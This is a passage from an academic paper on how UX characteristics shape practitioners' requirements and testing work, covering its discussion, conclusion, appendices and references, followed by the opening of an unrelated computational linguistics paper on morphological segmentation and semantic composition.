2012). However, an explanation for why this is the case is missing in the current body of knowledge. We observed a similar trend in the studied organizations. We additionally found explanations for this lopsided focus by investigating how the characteristics of UX impact day-to-day work of practitioners. These characteristics were in fact also highlighted by the interviewees when describing the challenges or discussing their work with UX mainly in comparison to usability. Some examples of the interviewees’ quotations in relation to these characteristics are shown in Table 3. It is not surprising that these characteristics were pointed out only by those interviewees who have knowledge and experience on UX. Below, we clarify how our practitioners experience the implications of these characteristics in their work with UX (see Table 4 for a summary). In total, we identified 20 such difficulties that mainly concern requirements and testing activities in software development. As shown in Table 4, 11 of these implications have been previously reported in literature. However, to the best of our knowledge, the remaining nine implications are unique to our study. Clearly, our study did not focus on identifying these implications. Further research is needed to provide a more comprehensive understanding of them, and their interconnections. The holistic nature of UX requires addressing not only do-goals but also be-goals. Practitioners however believe that eliciting be-goals and translating them into requirements and design solutions is more difficult than for functionality or other quality characteristics. One explanation may be that practitioners disagree on whether they should identify and refine these be-goals in parallel, before or after other do-goals, including functionality. Another explanation may be that these practitioners have limited access to guidelines, tools and methods for treating be-goals in their word. Previous research (Law, Van Schaik & Roto, 2014) emphasizes that still limited practical guidelines exist on how to choose suitable UX measures and metrics for UX underlying elements, and interpret their findings to improve the overall UX. We additionally found that this challenge also negatively impacts requirements and design. UX requirements, design and evaluation methods are still developing. Methods such as emocards Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 28/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130 Table 3 UX characteristic and their implications for the identified challenges as supported by our data. Characteristic Sample quotes regarding challenges Subjective ‘‘it is difficult to sort out or really get the correct feeling that the user has because they will try to explain it but it perhaps is not the real emotion that we catch at the end, if it would be a method or approach to really get these from the user that would be great.’’ (A-2/HCI) Holistic ‘‘Functional requirements are easy to create, to merge into a design; more emotional things are more difficult.’’ (F-1/HCI) Dynamic ‘‘It’s a fantastic feeling to sit in a brand-new car in a car shop. How do you feel about the same car if you’ve had it for a year, driving it around with two kids in the backseat, for instance? Experiencing all of the quirks from the interior, and all the things that don’t work, the stupid things that make your hands go dirty every time you’re supposed to close a door, for in- stance? That’s part of user experience design. So it’s a very floating scale.’’ (H-1/HCI) Context-dependent ‘‘I think user tests tend to be more focused on pure usability. I guess it’s when you’re releasing the product into the wild, that’s when you start to get maybe the most valuable feedback or the most truthful ones. So it’s often good to make some sort of what we call a beta product and publish it. Let people interact with it. But that’s a luxury also because that takes time. Often, in many, many cases, you have to just make something work. In an ideal world you should have a testing phase, of course. To get the users’ perspective. That should be really nice to have.’’ (A-4/HCI) Worthwhile ‘‘if I start with ‘how’, I will never get to the ‘why’. If I start with ‘what’, with just making things, I will totally miss every im- portant point there is. For me it tends to be very, very useful to focus on the why. So if I can sort of see this why, even if it’s very, very unclear, I can sort of approach this ‘how’ and ‘what’ in a much better way. (G-1/HCI) Table 4 In relation to the characteristics of UX, we identified the above 20 implications. These implications can explain the extra difficulties that practitioners face in their work with UX compared to other quality characteristics, including usability. UX characteristics Implications (i.e., extra difficulties) as perceived by practitioners • UX relies on human subjective perception • UX is temporal and there is a complex relation between various episodes of experience • UX emerges from complexly intertwined underlying elements • UX includes both hedonic (be-goals) and pragmatic (do-goals) aspects • UX is unique and situated in the context • UX is worthwhile, about adding value, and more than just preventing problems and frustrations • UX work is perceived to be morea visible in the development process than usability work (our finding) • abstract UX-related needs (e.g., be-goals or emotional needs) are difficult to refine and translate into more concrete ones (our finding) • it is hard to translate abstract UX-related needs to concrete design solutions (our finding) • it is hard to frame UX in evaluations because of all the complex underlying dependencies between its elements (our finding) • there is a lack of consensus among practitioners on whether abstract UX-related needs should be elicited before, after or in parallel with other needs (our finding) • translating abstract UX-related needs (in particular for the hedonic aspect) to measurable requirements is perceived to be more difficult than for functionalities or other quality characteristics (our finding) • compared to the case of usability, more power struggles, and disagreements are perceived to rise between UX and non-UX practitioners (our findings) • it is perceived to be more difficult to decide between design alternatives and resolve power struggles and disagreements that can arise between UX and non-UX practitioners (our findings) • requirements related to the hedonic aspect of UX are either neglected or treated informally (our findings) • UX-related needs of users are abstract concepts (literature, our finding) • practitioners do not have access to standardized and agreed upon set of UX measures and metrics (literature, our finding) • field studies are crucial in UX work, in particular to gather authentic user experiences but are perceived to be more resource demanding (literature, our findings) • creating and using more sophisticated prototypes are vital in UX evaluations but are perceived to require more resources (literature, our finding) • practitioners are skeptical about effectiveness and reliability of current UX evaluation methods (literature, our finding) • practitioners do not always have access to enough users (literature, our finding) • practitioners do not always have access to sophisticated prototypes in earlier phases (literature, our finding) • practitioners do not often know how to measure the whole UX in relation to its underlying elements (literature, our finding) • users’ memory of their experience is prone to fabrication and fading (literature, our finding) • a deeper understanding of the relation between UX and time is missing (literature, our finding) • a deeper understanding of the relation between UX and memory is missing (literature, our finding) Notes. aAdmittedly, we are not drawing any quantitative conclusion from our qualitative data. Here, we merely aim to emphasize the interviewees’ perception of different issues. Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 29/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130 (Desmet, Overbeeke & Tax, 2001) for gathering users’ momentary emotions about the interaction and UX curve (Kujala et al., 2011) for long-term UX evaluation have been introduced but they are not widely accepted in industrial software development. We therefore highlight a need for more research on developing industry-relevant guidelines, tools and methods for identifying and selecting underlying hedonic and pragmatic elements of UX not only for measurement purposes but also for requirements and design activities. Practitioners were also generally skeptical about the ability to address the subjective nature of UX in evaluations. For instance, our interviewees were concerned that what a user remembers about his or her emotions and shares in interviews or observations may not reflect the reality. Our interviewee’s concern confirms the findings of Law, Van Schaik & Roto (2014). Practitioners believed that the most truthful data about experience and perception of users can only be gathered in the field, and through using a functional version of the product in a real situation. However, field studies are too resource demanding (Vermeeren et al., 2010) and not feasible in all projects. We additionally found that despite skepticism about interviews and observations, these methods are common in industry. Moreover, organizations often resist introducing more novel tools and methods for various reasons including the cost of these tools and methods, or lack of knowledge and awareness about their value. In addition, our interviewees found it difficult to evaluate UX because of its subjectivity. They emphasize that while there is a great need to involve the end users in evaluations, accessing them in projects is often rare. Limited access to the end users is a known and persistent problem in the industry (Bak et al., 2008). However, we argue that compared to usability work, UX work is, to a larger extent, impacted by this limitation. According to the current studies, to reduce the impact of subjectivity on evaluations and to generate less biased and more reliable results (i) more users need to be involved in evaluations for statistical significance (Law, Van Schaik & Roto, 2014), and (ii) other stakeholders (e.g., developers) cannot act as substitutes for users in evaluations because they are biased towards the software being developed by their organizations (Locascio et al., 2016). On the other hand, the limitations of access to end users and competencies can be easier to overcome in the case of usability through involving limited number of users (e.g., involving five users in usability tests (Nielsen, 1993)) or using internal stakeholders as test subjects (Locascio et al., 2016). Also, our interviewees found it difficult to evaluate subjective and holistic experiences of users because access to functioning or complete prototypes is often rare in earlier phases of projects. One solution is to apply evaluation tools and methods that do not require functioning or complete prototypes but rely on practitioners’ imagination of how users may perceive the design, which is however an open research topic (Vermeeren et al., 2010). We also saw practical difficulties concerning handling the relation between different episodes of experience. It is important to take this relation into account in evaluations because of the dynamic nature of UX. The practitioners lacked knowledge and expertise on finding a balance between short- and long-term experiences in both design and evaluation. Hence, we agree with Law, Van Schaik & Roto (2014) that the community still lacks enough understanding of the relation between UX, time and memory (the Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 30/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130 implications of the subjective and dynamic nature of UX), and suitable UX metrics and measures that can support this relation are lacking. The UX practitioners brought up the worthwhile (i.e., positive) nature of UX mainly when discussing their approach to requirements and design. The UX practitioners believed this aspect of experience (i.e., the value) or the ‘why’ behind developing the software for the end users, should be identified before the ‘how’ and ‘what’ that is connected to usability and functionality. Nevertheless, this view is often in conflict with traditional and common approaches to software development that focus on identifying functionality or other quality characteristics (Chung et al., 2000). The practitioners also pointed to the worthwhile nature of UX when describing their way of working and priorities. While the UX practitioners emphasize the software value from both the user and business perspective, non-UX practitioners often tend to merely focus on the business perspective which can create tensions between UX and non-UX practitioners. In particular, since practitioners still do not have enough knowledge, or tools and methods to make informed trade-offs between these two perspectives. For instance, to deliver a certain experience, UX practitioners may suggest one design solution to support specific user needs, but business stakeholders may suggest another solution to support specific business goals. While previous empirical studies report limited access to usability professionals (e.g., Bak et al., 2008), the organizations we studied seem to have enough access to usability competencies which may indicate a general improvement of usability work in the industry. However, these organizations suffer from limited access to UX competencies, in particular concerning the hedonic aspect of UX and addressing various be-goals. To overcome the lack of UX and usability competencies, current research suggests simplifying well-known testing methods and training developers to perform them (Oevad & Larsen, 2016). While this approach is shown to be useful in the case of usability and the pragmatic aspect of UX (Locascio et al., 2016; Oevad & Larsen, 2016), this is not necessarily the case for the hedonic and more subjective aspect of UX. For instance, as mentioned before, developers’ bias is shown to compromise the validity of testing results because developers are loyal to the products they develop and their organizations (Locascio et al., 2016). In the studied organizations, the responsibilities of usability professionals are well understood and defined while there are uncertainties concerning the UX-related responsibilities. In addition, our interviewees perceive that power struggles appear more often and are more difficult to resolve for UX than for usability. Previous studies report power struggles between developers and designers as a challenge to UX and usability work (Chamberlain, Sharp & Maiden, 2006) but do not give explanations for why this is the case. Here, we give more empirical support for this challenge, and additionally provide explanations for it. One explanation can be that UX responsibilities are diverse and can overlap the work of non-UX practitioners such as business and requirements analysts. Another explanation is that all stakeholders experience different products and services on a day-to-day basis. Therefore, non-UX practitioners can easily have opinions about what experiences the software should deliver, and how they should be delivered, i.e., through which design Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 31/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130 solutions. This can lead to power struggles even in cases when there is no overlap between UX and non-UX responsibilities. Another explanation may be that UX practitioners should be involved early on and throughout projects, and their responsibilities involve strategic decision making hence the work of UX practitioners is more visible in projects as our interviewees emphasized. The practitioners believed they can partially overcome the power struggles by increasing UX knowledge and awareness in organizations, and informing other stakeholders about UX responsibilities (what, why and how of UX practices), especially in relation to the overall strategies of the organization. In contrast to what we discussed above for UX, practitioners can test other software quality characteristics in labs, and even without necessarily using a sophisticated prototype of the software or even involving the end users. For example, usability can be tested on simple paper prototypes, using heuristic or other expert evaluations, or performance problems can be minimized through the use of software performance prediction approaches in earlier phases (Balsamo et al., 2004). In the case of other software quality characteristics, the focus is on actual measures and values not the users’ subjective perception of these values. Additionally, in contrast to UX, other quality characteristics are not dependent on time. For instance, performance or security measurements will have the same results even when repeated over time, provided that the software, and the test context (e.g., CPU load) have not changed. In other words, the difficulties we discussed above concerning requirements and testing of UX are either less severe or not even present for other quality characteristics, making their practice less challenging as perceived by our participants. Limited access to the end users and competencies are also less critical when addressing usability. Power struggles can be resolved using objective evidence that shows why an alternative is better than another. This can for instance be achieved through measurements which is possible for other quality characteristics, including usability, at least in theory. However, as we saw, measuring UX is difficult and even impossible in earlier phases. In addition, UX metrics and measures are not agreed upon or standardized, yet for other quality characteristics, practitioners have access to standards, e.g., ISO/IEC 9126-4 (International Organisation for Standardisation (ISO), 2004). Therefore, in the case of UX, it is difficult to decide among various alternatives in order to resolve the power struggles. Furthermore, the importance of the pragmatic and hedonic aspects of UX varies in different projects. For instance, maximizing efficiency is not always relevant for the software being designed, and not every software is required to support different be-goals such as curiosity, motivation, interest or fun. Similarly, different characteristics of UX have different importance in different projects. While the first impression (i.e., temporality) may be more important for an e-commerce software, an e-learning software may require more focus on motivation (i.e., situatedness). We however argue that practitioners need to have sufficient knowledge and awareness on the hedonic and pragmatic aspects, UX characteristics, and be-goals to be able to make an informed decision regarding their relevance and importance in various projects. Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 32/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130 Our study contributes to the current body of knowledge through identifying the overlaps in challenges of UX and other quality characteristics, in particular usability. These overlaps underline the significance of these challenges and call for more research on how to overcome them in practice. By highlighting these overlaps, we can help identify research areas for improving the work of UX as well as software quality in general. We can also make it easier for practitioners to spot, better understand, as well as find mitigation strategies for UX challenges by learning from past experiences and developments in the area of software quality. In addition, our study contributes to the current body of knowledge through connecting the challenges to the UX characteristics and clarifying the implications of these characteristics in day-to-day work of practitioners, in particular in comparison to usability and other quality characteristics. Based on our work, there are at least three future studies that could be particularly interesting. First, it would be relevant to conduct an in-depth study to investigate various approaches that the academics or practitioners propose or apply to address the identified challenges, most importantly in relation to the characteristics of UX, and different software development cultures. Second, it would also be valuable to examine the differences between UX and other quality characteristics, and their associated practices in more depth through a deeper case study. We have reported on the similarities and differences between UX and other quality characteristics to the extent supported by our data. Because of the explorative nature of this study our data does not support details about how the studied organizations handle various quality characteristics in their day-to-day work. Third, we did not study how the type of software being developed (e.g., leisure vs work) may impact the identified challenges in the studied organizations. Investigating the correlation between the types of software and practices and challenges is an interesting future research direction. Investigating this correlation can help organizations better understand the cause and effect of the challenges and better plan for addressing them. CONCLUSION Designing and developing for UX is a multidimensional and multidisciplinary activity which has not yet gained an established position in the software industry. Many development companies still fail to deliver good UX in their products and services, and practitioners in these companies face various challenges when dealing with UX throughout their projects. Although UX is different from usability, many of the present frameworks and guidelines for UX integration do not clearly separate these two concepts. Moreover, the perception of UX generally differs in academic and industrial contexts: whereas the former concentrates on the hedonic aspect and emotions, the latter focuses more on functionality and usability issues. Our study shows that approaches for integrating UX into software development require further development. In particular, we showed that the characteristics of UX (Hassenzahl, 2003), i.e., subjective, holistic, dynamic, context-dependent, and worthwhile play an important role in shaping UX challenges. We provided a deeper analysis of UX challenges through the lens of the aforementioned UX characteristics. These characteristics have at least 20 implications for the day-to-day Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 33/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130 work of practitioners. To the best of our knowledge, nine of these implications have not been previously reported, and are unique to our study. Through these implications, we explained the extra difficulties practitioners face in their work with UX compared to usability and other quality characteristics. We could also explain the lopsided focus of industry on the pragmatic aspect of UX. The related work does not provide such an analysis nor does it often make such a differentiation between UX and usability except for the few studies we summarized the related work. We therefore bring depth to the identified challenges by presenting their relation to the UX characteristics. We hope to have helped the community to identify ways to systematically improve the current UX. To make future progress with integrating UX practices into software development processes, the community needs to take into account these UX characteristics and their implications for the day-to-day work of practitioners when developing guidelines, tools and methods to address related challenges. Practitioners need to be aware of the UX characteristics not only in evaluations but also requirement and design activities. It is also of crucial importance to understand and address the impact of these characteristics on communication and collaboration between UX and non-UX practitioners. Admittedly, the importance of the pragmatic and hedonic aspects of UX is different in projects. Nevertheless, practitioners need to be aware of the differences between these aspects, and various UX characteristics to make an informed decision in each project regarding where to focus and why. The challenges and implications we present in this paper can guide future research on UX integration and creating more awareness concerning UX, and related challenges in the software industry. Our findings can also shed light on the more general problem of how practitioners should integrate new and less mature knowledge areas, of which software quality characteristics and UX are examples, into software development processes. ACKNOWLEDGEMENTS The authors would like to thank all the organizations and in particular practitioners who participated in this study. APPENDIX A. INTERVIEW GUIDE General questions • What is your education and work background? • What is your role in this company? • How many years have you had this role? • Do you know any of these terms (see Appendix C)? if yes, how do you apply them in your work? • How do you define UX? • How do you define Usability? Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 34/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130 Questions related to requirements • How is the overall requirements process in your company? • How do you approach functional requirements? • How do you approach non-functional/quality requirements? • How do you approach requirements related to UX? • What challenges do you face in your work regarding requirements related to UX? Questions related to design • How is the overall design process in your company? • How is ‘design’ related to ‘requirements’ in your work? • What challenges do you face in your work regarding design, in particular in relation to UX? Questions related to evaluation or testing • How is the overall evaluation/testing process in your company? • How do you test functional requirements? • How do you test non-functional requirements? • How do you test UX? • What challenges do you face in testing UX, or requirements related to UX? APPENDIX B. CODING GUIDE • Every segment can have any number of applicable codes • The codes should be selected from the list below. If a new concept appears in data the possibility of adding a new code should be discussed among the authors. • Any uncertainty in coding a segment should be discussed among the authors. List of codes 1. Challenges 2. Solutions 3. UX 4. Usability 5. UX vs Usability 6. Motives 7. Definition 8. Organization 9. Project 10. Software 11. Process 12. Individuals 13. Tools and methods 14. Roles 15. Responsibilities 16. Collaboration Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 35/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130 17. Communication 18. Requirements 19. Evaluations APPENDIX C. TERMINOLOGY TABLE The interviewees were asked to specify each and every term they know and whether they apply it in their work. They were also asked to add any relevant term that is missing from the list. • Usability • User Experience • Quality in Use (QiU) • Emotional design • Pleasurable design • Aesthetics of design • Affective computing • Affective design • Usability requirements • UX requirements • Affective requirements • Emotional requirements • User values • User emotions • User motivations • ISO/IEC 9126 • ISO/IEC 25010 • Hedonic and pragmatic • Instrumental and non-instrumental ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Author Contributions • Pariya Kashfi conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Agneta Nilsson and Robert Feldt conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 36/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130 Data Availability The following information was supplied regarding data availability: The raw data includes the interviewee recordings and transcripts which because of NDA between Chalmers University and collaborative industries (i.e., companies who participated in the interviewees) are not allowed to be shared with any third party. More quotations are included and the coding process is elaborated to address this issue partially. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.130#supplemental-information. REFERENCES Abrahão S, Juristo N, Law EL-C, Stage J. 2010. Interplay between usability and software development. Journal of Systems and Software 83(11):2015–2018 DOI 10.1016/j.jss.2010.05.080. Alves R, Valente P, Nunes NJ. 2014. The state of user experience evaluation practice. In: Proceedings of the 8th nordic conference on human–computer interaction: fun, fast, foundational (NordiCHI ’14). New York: ACM, 93–102. Ardito C, Buono P, Caivano D, Costabile MF, Lanzilotti R, Dittrich Y. 2014. Human- centered design in industry: lessons from the trenches. Computer 47(12):86–89 DOI 10.1109/MC.2014.355. Bak JO, Nguyen K, Risgaard P, Stage J. 2008. Obstacles to usability evaluation in practice. In: 5th Nordic conference on human–computer interaction building bridges— NordiCHI’08. New York: ACM Press, 23. Balsamo S, Di Marco A, Inverardi P, Simeoni M. 2004. Model-based performance prediction in software development: a survey. IEEE Transactions on Software Engineering 30(5):295–310 DOI 10.1109/TSE.2004.9. Berntsson Svensson R, Gorschek T, Regnell B, Torkar R, Shahrokni A, Feldt R. 2012. Quality requirements in industrial practice—an extended interview study at eleven companies. IEEE Transactions on Software Engineering 38(4):923–935 DOI 10.1109/TSE.2011.47. Boivie I, Gulliksen J, Göransson B. 2006. The lonesome cowboy: a study of the usability designer role in systems development. Interacting with Computers 18(4):601–634 DOI 10.1016/j.intcom.2005.10.003. Borg A, Yong A, Carlshamre P, Sandahl K. 2003. The bad conscience of requirements engineering: an investigation in real-world treatment of non-functional require- ments. In: Proceedings of the 3rd conference on software engineering research and practice in Sweden (SERPS’03). 1–8. Braun V, Clarke V. 2006. Using thematic analysis in psychology. Qualitative Research in Psychology 3(2):77–101 DOI 10.1191/1478088706qp063oa. Cajander Å, Lárusdóttir MK, Gulliksen J. 2013. Existing but not explicit—the user perspective in scrum projects in practice. In: Proceedings of the 14th IFIP TC 13 Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 37/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.130#supplemental-information http://dx.doi.org/10.7717/peerj-cs.130#supplemental-information http://dx.doi.org/10.1016/j.jss.2010.05.080 http://dx.doi.org/10.1109/MC.2014.355 http://dx.doi.org/10.1109/TSE.2004.9 http://dx.doi.org/10.1109/TSE.2011.47 http://dx.doi.org/10.1016/j.intcom.2005.10.003 http://dx.doi.org/10.1191/1478088706qp063oa http://dx.doi.org/10.7717/peerj-cs.130 international conference human–computer interaction (INTERACT 2013). Berlin, Heidelberg: Springer, 762–779. Chamberlain S, Sharp H, Maiden N. 2006. Towards a framework for integrating agile development and user-centred design. In: Abrahamsson P, Marchesi M, Succi G, eds. 7th international conference, XP 2006. Lecture notes in computer science, Oulu, Finland, 143–153. Chung L, Do Prado Leite JCS. 2009. On non-functional requirements in software engineering. In: Borgida AT, Chaudhri VK, Giorgini P, Yu E, eds. Conceptual modeling: foundations and applications, ser. Lecture notes in computer science. Vol. 5600. Berlin Heidelberg: Springer, 363–379. Chung L, Nixon BA, Yu E, Mylopoulos J. 2000. Non-functional requirements in software engineering. Boston: Kluwer Academic Publishing. Desmet P, Overbeeke K, Tax S. 2001. Designing products with added emotional value: development and application of an approach for research through design. The Design Journal 4(1):32–47 DOI 10.2752/146069201789378496. Ferreira J, Sharp H, Robinson H. 2012. Agile development and user experience design integration as an ongoing achievement in practice. In: Proceedings of the 2012 agile conference (AGILE 2012). Piscataway: IEEE, 11–20. Flick U. 2009. An introduction to qualitative research. 4th edition. London: Sage Publica- tions. Gerea C, Herskovic V. 2007. Measuring user experience in latin america: an exploratory survey. In: Proceedings of the Latin American conference on human computer interaction—CLIHC’15. New York: ACM Press, 1–4. Gulliksen J, Boivie I, Persson J, Hektor A, Herulf L. 2004. Making a difference: a survey of the usability profession in Sweden. In: Proceedings of the 3rd Nordic conference on human–computer interaction (NordiCHI’04). New York: ACM, 207–215. Hassenzahl M. 2003. The thing and I: understanding the relationship between user and product. In: Blythe MA, Monk AF, Overbeeke K, Wright PC, eds. Funology: from usability to enjoyment. Dordrecht: Springer Netherlands, 31–42. Hassenzahl M. 2010. Experience design: technology for all the right reasons. San Francisco: Morgan & Claypool. Hassenzahl M, Burmester M, Koller F. 2003. AttrakDiff: ein Fragebogen zur Messung wahrgenommener hedonischer und pragmatischer Qualität (Attraktif: a question- naire for the measurement of perceived hedonic and pragmatic quality). In: Ziegler J, Szwillus G, eds. Mensch & computer 2003: interaktion in bewegung. Stuttgart: B.G. Teubner, 187–196. Hassenzahl M, Diefenbach S, Göritz A. 2010. Needs, affect, and interactive products— facets of user experience. Interacting with Computers 22(5):353–362 DOI 10.1016/j.intcom.2010.04.002. Hassenzahl M, Tractinsky N. 2006. User experience—a research agenda. Behaviour & Information Technology 25(2):91–97 DOI 10.1080/01449290500330331. Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 38/40 https://peerj.com http://dx.doi.org/10.2752/146069201789378496 http://dx.doi.org/10.1016/j.intcom.2010.04.002 http://dx.doi.org/10.1080/01449290500330331 http://dx.doi.org/10.7717/peerj-cs.130 International Organisation for Standardisation (ISO). 2004. ISO 9126: software engineering—product quality—Part 4: quality in use metrics. Geneva: International Organisation for Standardisation. International Organisation for Standardisation (ISO). 2011. ISO 25010: systems and software engineering—Systems and software Quality Requirements and Evaluation (SQuaRE)—System and software quality models. Geneva: International Organisation for Standardisation. Isomursu M, Sirotkin A, Voltti P, Halonen M. 2012. User experience design goes agile in lean transformation—a case study. In: Proceedings of the 2012 agile conference (AGILE 2012). Piscataway: IEEE, 1–10. Jordan PW. 2002. Designing pleasurable products: an introduction to the new human factors. Boca Raton: CRC Press. Karlsson L, Dahlstedt Å. G, Regnell B, Natt och Dag J, Persson A. 2007. Requirements engineering challenges in market-driven software development—an interview study with practitioners. Information and Software Technology 49(6):588–604 DOI 10.1016/j.infsof.2007.02.008. Kashfi P, Feldt R, Nilsson A, Svensson RB. 2016. Evidence-based timelines for user experience software process improvement retrospectives. In: 42nd euromicro conference on software engineering and advanced applications. Piscataway: IEEE. Kujala S, Roto V, Väänänen-Vainio-Mattila K, Sinnelä A. 2011. Identifying hedonic factors in long-term user experience. In: Proceedings of the 2011 conference on designing pleasurable products and interfaces (DPPI ’11). New York: ACM, 17:1–17:8. Kuusinen K, Väänänen-Vainio-Mattila K. 2012. How to make agile UX work more efficient: management and sales perspectives. In: Proceedings of the 7th nordic conference on human–computer interaction: making sense through design (NordiCHI ’12). New York: ACM, 139–148. Lanzilotti R, Costabile MF, Ardito C, Informatica D, Aldo B. 2015. Addressing usability and UX in call for tender for IT products. In: Proceedings of the 15 th IFIP TC 13 international conference human–computer interaction (INTERACT 2015), 1–8. Law EL-C, Abrahão S. 2014. Interplay between User Experience (UX) evaluation and sys- tem development. International Journal of Human-Computer Studies 72(6):523–525 DOI 10.1016/j.ijhcs.2014.03.003. Law EL-C, Van Schaik P, Roto V. 2014. Attitudes towards user experience (UX) measurement. International Journal of Human-Computer Studies 72(6):526–541 DOI 10.1016/j.ijhcs.2013.09.006. Locascio J, Khurana R, He Y, Kaye J. 2016. Utilizing employees as usability participants: exploring when and when not to leverage your coworkers. In: Proceedings of the 2016 CHI conference on human factors in computing systems. New York: ACM, 4533–4537. Nielsen J. 1993. Usability engineering. Cambridge: Academic Press Inc. Nuseibeh B, Easterbrook S. 2000. Requirements engineering: a roadmap. In: Proceedings of the conference on the future of software engineering–ICSE’00. Vol. 1. New York: ACM Press, 35–46. Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 39/40 https://peerj.com http://dx.doi.org/10.1016/j.infsof.2007.02.008 http://dx.doi.org/10.1016/j.ijhcs.2014.03.003 http://dx.doi.org/10.1016/j.ijhcs.2013.09.006 http://dx.doi.org/10.7717/peerj-cs.130 Oevad T, Larsen LB. 2016. How to reduce the UX bottleneck—train your soft- ware developers. Behaviour & Information Technology 35(12):1080–1090 DOI 10.1080/0144929X.2016.1225818. Ovad T, Larsen LB. 2015. The prevalence of UX design in agile development processes in industry. In: Proceedings of the 2015 agile conference (AGILE 2015). Piscataway: IEEE, 40–49. Paech B, Kerlow D. 2004. Non-functional requirements engineering—quality is essential. In: Proceedings of the 10th international working conference on requirements engineering: foundation for software quality (REFSQ’04), 237–250. Rosenbaum S, Rohn JA, Humburg J. 2000. A toolkit for strategic usability. In: Proceed- ings of the SIGCHI conference on Human factors in computing systems (CHI’00). New York: ACM, 337–344. Runeson P, Höst M. 2008. Guidelines for conducting and reporting case study re- search in software engineering. Empirical Software Engineering 14(2):131–164 DOI 10.1007/s10664-008-9102-8. Väänänen-Vainio-Mattila K, Roto V, Hassenzahl M. 2008. Now Let’s do it in practice: user experience evaluation methods in product development. In: Proceedings of extended abstracts on human factors in computing systems (CHI’08). New York: ACM, 3961–3964. Vermeeren APOS, Law EL-C, Roto V, Obrist M, Hoonhout J, Väänänen-Vainio-Mattila K. 2010. User experience evaluation methods: current State and Development needs. In: Proceedings of the 6th nordic conference on human–computer interaction extending boundaries (NordiCHI ’10). New York: ACM, 521–530. Wright P, McCarthy J. 2010. Experience-centered design: designers, users, and com- munities in dialogue, ser. In: Synthesis lectures on human-centered informatics. San Francisco: Morgan & Claypool. Zimmermann PG. 2008. Beyond usability-measuring aspects of user experience. PhD Dissertation, Swiss Federal Institute of Technology Zurich. Kashfi et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.130 40/40 https://peerj.com http://dx.doi.org/10.1080/0144929X.2016.1225818 http://dx.doi.org/10.1007/s10664-008-9102-8 http://dx.doi.org/10.7717/peerj-cs.130 work_cxyxl5vs6zd6xlanudcx46qoqy ---- Joint Semantic Synthesis and Morphological Analysis of the Derived Word Ryan Cotterell Department of Computer Science Johns Hopkins University ryan.cotterell@jhu.edu Hinrich Schütze CIS LMU Munich inquiries@cislmu.org Abstract Much like sentences are composed of words, words themselves are composed of smaller units. For example, the English word questionably can be analyzed as question+able+ly. However, this structural decomposition of the word does not directly give us a semantic representation of the word’s meaning. Since morphology obeys the principle of compositionality, the semantics of the word can be systematically derived from the meaning of its parts. In this work, we propose a novel probabilistic model of word formation that captures both the analysis of a word w into its constituent segments and the synthesis of the meaning of w from the mean- ings of those segments. Our model jointly learns to segment words into morphemes and compose distributional semantic vectors of those morphemes. We experiment with the model on English CELEX data and German DErivBase (Zeller et al., 2013) data. We show that jointly modeling semantics increases both segmentation accuracy and morpheme F1 by between 3% and 5%. Additionally, we investigate different models of vector compo- sition, showing that recurrent neural networks yield an improvement over simple additive models. Finally, we study the degree to which the representations correspond to a linguist’s notion of morphological productivity. 1 Introduction In most languages, words decompose further into smaller units, termed morphemes. For example, the English word questionably can be analyzed as question+able+ly. This structural decomposition of the word, however, by itself is not a semantic rep- resentation of the word’s meaning;1 we further re- quire an account of how to synthesize the meaning from the decomposition. Fortunately, words—just like phrases—to a large extent obey the principle of compositionality: the semantics of the word can be systematically derived from the meaning of its parts.2 In this work, we propose a novel joint prob- abilistic model of word formation that captures both structural decomposition of a word w into its con- stituent segments and the synthesis of w’s meaning from the meaning of those segments. Morphological segmentation is a structured pre- diction task that seeks to break a word up into its constituent morphemes. The output segmentation has been shown to aid a diverse set of applications, such as automatic speech recognition (Afify et al., 2006), keyword spotting (Narasimhan et al., 2014), machine translation (Clifton and Sarkar, 2011) and parsing (Seeker and Çetinoğlu, 2015). In contrast to much of this prior work, we focus on supervised segmentation, i.e., we provide the model with gold segmentations during training time. Instead of sur- 1There are many different linguistic and computational theo- ries for interpreting the structural decomposition of a word. For example, un- often signifies negation and its effect on semantics can then be modeled by theories based on logic. This work ad- dresses the question of structural decomposition and semantic synthesis in the general framework of distributional semantics. 2Morphological research in theoretical and computational linguistics often focuses on noncompositional or less com- positional phenomena—simply because compositional deriva- tion poses fewer interesting research problems. It is also true that—just as many frequent multiword units are not completely compositional—many frequent derivations (e.g., refusal, fit- ness) are not completely compositional. An indication that non- lexicalized derivations are usually compositional is the fact that standard dictionaries like OUP editors (2010) list derivational affixes with their compositional meaning, without a hedge that they can also occur as part of only partially compositional forms. See also Haspelmath and Sims (2013), §5.3.6. 33 Transactions of the Association for Computational Linguistics, vol. 